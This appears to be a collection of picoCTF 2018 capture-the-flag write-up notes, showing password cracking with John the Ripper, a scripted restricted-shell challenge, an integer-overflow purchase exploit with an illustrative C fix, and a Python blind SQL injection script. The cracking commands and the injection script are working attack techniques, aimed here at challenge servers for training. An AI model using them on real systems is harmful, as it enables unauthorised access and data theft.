root@kali:~/Desktop/HEEEEEEERE'S Johnny!# john --wordlist=/usr/share/wordlists/rockyou.txt tocrack
Warning: detected hash type "sha512crypt", but the string is also recognized as "crypt"
Use the "--format=crypt" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Press 'q' or Ctrl-C to abort, almost any other key for status
thematrix        (root)
1g 0:00:00:18 DONE (2018-10-08 05:24) 0.05488g/s 604.1p/s 604.1c/s 604.1C/s kenya..saavedra
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~/Desktop/HEEEEEEERE'S Johnny!# john --show tocrack
root:thematrix:0:0:root:/root:/bin/bash
~ nc 2018shell1.picoctf.com 33158
Sweet! We have gotten access into the system but we aren't root. It's some sort of restricted shell! I can't see what you are typing but I can see your output. I'll be here to help you along. If you need help, type "echo 'Help Me!'" and I'll see what I can do
There is not much time left!
~/$ ls
blackmail executables passwords photos secret
~/$ cd secret
Now we are cookin'! Take a look around there and tell me what you find!
~/secret$ ls
intel_1 intel_2 intel_3 intel_4 intel_5 profile_AipieG5Ua9aewei5ieSoh7aph profile_Xei2uu5suwangohceedaifohs profile_ahShaighaxahMooshuP1johgo profile_ahqueith5aekongieP4ahzugi profile_aik4hah9ilie9foru0Phoaph0 profile_bah9Ech9oa4xaicohphahfaiG profile_ie7sheiP7su2At2ahw6iRikoe profile_of0Nee4laith8odaeLachoonu profile_poh9eij4Choophaweiwev6eev profile_poo3ipohGohThi9Cohverai7e
Sabatoge them! Get rid of all their intel files!
~/secret$ rm intel_*
Nice! Once they are all gone, I think I can drop you a file of an exploit! Just type "echo 'Drop it in!' " and we can give it a whirl!
~/secret$ echo 'Drop it in!'
Drop it in!
I placed a file in the executables folder as it looks like the only place we can execute from! Run the script I wrote to have a little more impact on the system!
~/secret$ cd ..
~/$ cd executables
~/executables$ ls
dontLookHere
~/executables$ ./dontLookHere
[several hundred groups of random-looking hex output omitted]
Looking through the text above, I think I have found the password. I am just having trouble with a username.
Oh drats! They are onto us! We could get kicked out soon! Quick! Print the username to the screen so we can close are backdoor and log into the account directly!
You have to find another way other than echo!
~/executables$ whoami
l33th4x0r
Perfect! One second! Okay, I think I have got what we are looking for. I just need to to copy the file to a place we can read. Try copying the file called TopSecret in tmp directory into the passwords folder.
~/executables$ cp /tmp/TopSecret ~/passwords
: command not found or invalid
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ in tmp directory into the passwords folder.
in: command not found or invalid
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ cp /tmp/TopSecret ~/passwords
~/executables$ cp /tmp/TopSecret ../passwords
Server shutdown in 10 seconds... Quick! go read the file before we lose our connection!
~/executables$ cd ..
~/$ cd passwords
~/passwords$ ls
TopSecret
~/passwords$ cat TopSecret
Major General John M. Schofield's graduation address to the graduating class of 1879 at West Point is as follows: The discipline which makes the soldiers of a free country reliable in battle is not to be gained by harsh or tyrannical treatment.On the contrary, such treatment is far more likely to destroy than to make an army.It is possible to impart instruction and give commands in such a manner and such a tone of voice as to inspire in the soldier no feeling butan intense desire to obey, while the opposite manner and tone of voice cannot fail to excite strong resentment and a desire to disobey.The one mode or other of dealing with subordinates springs from a corresponding spirit in the breast of the commander.He who feels the respect which is due to others, cannot fail to inspire in them respect for himself, while he who feels,and hence manifests disrespect towards others, especially his subordinates, cannot fail to inspire hatred against himself.
picoCTF{CrUsHeD_It_9edaa84a}
Welcome to the Store App V1.0
World's Most Secure Purchasing App
[1] Check Account Balance
[2] Buy Stuff
[3] Exit
Enter a menu selection
2
Current Auctions
[1] I Can't Believe its not a Flag!
[2] Real Flag
1
Imitation Flags cost 1000 each, how many would you like?
10000000000000000
Your total cost is: -1981284352
Your new balance: 1981285452
Welcome to the Store App V1.0
World's Most Secure Purchasing App
[1] Check Account Balance
[2] Buy Stuff
[3] Exit
Enter a menu selection
2
Current Auctions
[1] I Can't Believe its not a Flag!
[2] Real Flag
2
A genuine Flag costs 100000 dollars, and we only have 1 in stock
Enter 1 to purchase
1
YOUR FLAG IS: picoCTF{numb3r3_4r3nt_s4f3_03054e5d}
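The two printed figures above are exactly what 32-bit wraparound produces: 10000000000000000 truncated to an int is 1874919424, times 1000 wraps to -1981284352, and the store then subtracts that negative cost from the balance. The following C is an added illustration, not the challenge's source (which is not on the page); it assumes a 32-bit int, the unit price of 1000 shown in the session, a quantity parsed into a wider type and then truncated, and a starting balance of 1100 derived from the two printed numbers. It reproduces the broken arithmetic beside a checked version.

```c
#include <limits.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Values taken from the Store App session: unit price and the quantity typed. */
#define FLAG_PRICE 1000
#define TYPED_QUANTITY 10000000000000000LL
/* Starting balance derived from the printed figures: 1981285452 - 1981284352. */
#define START_BALANCE 1100

/* Arithmetic the session output implies (assumed; the challenge source is not on
 * the page): the typed number is truncated to 32 bits and multiplied by the price
 * with no overflow check. Done in uint32_t so the wrap itself is well defined. */
int vulnerable_total(long long typed_quantity)
{
    uint32_t quantity = (uint32_t)typed_quantity;       /* 10^16 -> 1874919424 */
    uint32_t total = quantity * (uint32_t)FLAG_PRICE;    /* wraps mod 2^32 */
    return (int)total;                                   /* -1981284352 on two's complement */
}

int vulnerable_new_balance(int balance, int total)
{
    return balance - total;   /* subtracting a negative cost credits the account */
}

/* Hardened version: bound the quantity, make sure the multiplication cannot
 * overflow, and refuse a purchase the balance does not cover. */
bool checked_purchase(long long typed_quantity, long long balance, long long *new_balance)
{
    if (typed_quantity < 1 || typed_quantity > INT_MAX)
        return false;                              /* non-positive or absurd quantity */
    if (typed_quantity > LLONG_MAX / FLAG_PRICE)
        return false;                              /* multiplication would overflow */
    long long total = typed_quantity * FLAG_PRICE;
    if (total > balance)
        return false;                              /* cannot afford it */
    *new_balance = balance - total;
    return true;
}

int main(void)
{
    int total = vulnerable_total(TYPED_QUANTITY);
    printf("vulnerable: total %d, new balance %d\n",
           total, vulnerable_new_balance(START_BALANCE, total));
    long long nb = 0;
    printf("checked: %s\n",
           checked_purchase(TYPED_QUANTITY, START_BALANCE, &nb) ? "accepted" : "rejected");
    return 0;
}
```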
$row = $result->fetchArray();
if($answer == $CANARY) {
    echo "<h1>Perfect!</h1>";
    echo "<p>Your flag is: $FLAG</p>";
} elseif ($row) {
    echo "<h1>You are so close.</h1>";
} else {
    echo "<h1>Wrong.</h1>";
}
?>
There is a SQL injection here, and the page gives only two responses, "You are so close." and "Wrong.", so a blind injection can be used to recover answer one character at a time.
import requests
import string

# Blind injection: the answer is rebuilt one character at a time by testing
# whether "known prefix + candidate" matches. GLOB is used instead of LIKE
# because SQLite's LIKE is case-insensitive for ASCII while GLOB is not.
# GLOB metacharacters are skipped so a candidate such as '*' cannot produce
# a false "so close" match once the whole answer has been recovered.
CANDIDATES = [c for c in string.printable if c not in '*?[]' and not c.isspace()]

answer = ''
for i in range(100):
    for c in CANDIDATES:
        payload = "' or answer GLOB '{}*".format(answer + c)  # ' OR answer LIKE '
        print(payload)
        r = requests.post('http://2018shell1.picoctf.com:15987/answer2.php', data={'answer': payload})
        if 'so close' in r.text:
            print(r.text)
            answer += c
            print(answer)
            break
    else:
        # No candidate extended the prefix: the full answer has been recovered.
        break

# 41AndSixSixths
Help Me Reset 2
The comment <!--Proudly maintained by barboza--> in the page changes on every refresh; taken together with the challenge description, it should be a hint at the username.